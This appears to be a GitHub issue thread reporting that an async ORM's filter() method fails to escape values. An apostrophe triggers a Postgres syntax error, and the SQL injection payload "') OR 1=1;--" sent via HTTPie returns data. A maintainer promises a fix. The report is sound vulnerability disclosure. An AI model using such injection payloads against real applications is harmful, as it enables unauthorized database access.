`ModelManager.filter()` does not escape filter values.

Question

`ModelManager.filter()` does not escape filter values.

sqwishy opened this issue 7 years ago · comments

The ORM doesn't seem to sanitize values passed to filter(), so things like apostrophes can make it upset.

Reproduced using the "sanic" example in the repository:

# http --json -v 'localhost:9000/books/' name=="The Pilgrim's Progress"
GET /books/?name=The+Pilgrim%27s+Progress HTTP/1.1
Accept: application/json
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/json
Host: localhost:9000
User-Agent: HTTPie/0.9.4



HTTP/1.1 500 Internal Server Error
Connection: keep-alive
Content-Length: 6824
Content-Type: text/html; charset=utf-8
Keep-Alive: 60
...

With a traceback saying something about asyncpg.exceptions.PostgresSyntaxError: syntax error at or near "s"

Alternatively:

# http --json -v 'localhost:9000/books/' name=="') OR 1=1;--"
GET /books/?name=%27%29+OR+1%3D1%3B-- HTTP/1.1
Accept: application/json
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/json
Host: localhost:9000
User-Agent: HTTPie/0.9.4



HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 176
Content-Type: application/json
Keep-Alive: 60

{
    "count": 1,
    "method": "GET",
    "results": [
        {
            "book_type": null,
            "date_created": "2017-08-18",
            "id": 1,
            "name": "The Pilgrim's Progress",
            "pages": null,
            "synopsis": "an epic meme"
        }
    ],
    "status": 200
}

Héctor Alvarez · Answer 1 · Sat Aug 19 2017 20:40:39 GMT+0800 (China Standard Time)

hey @sqwishy thanks for pointing that out, will take care of that asap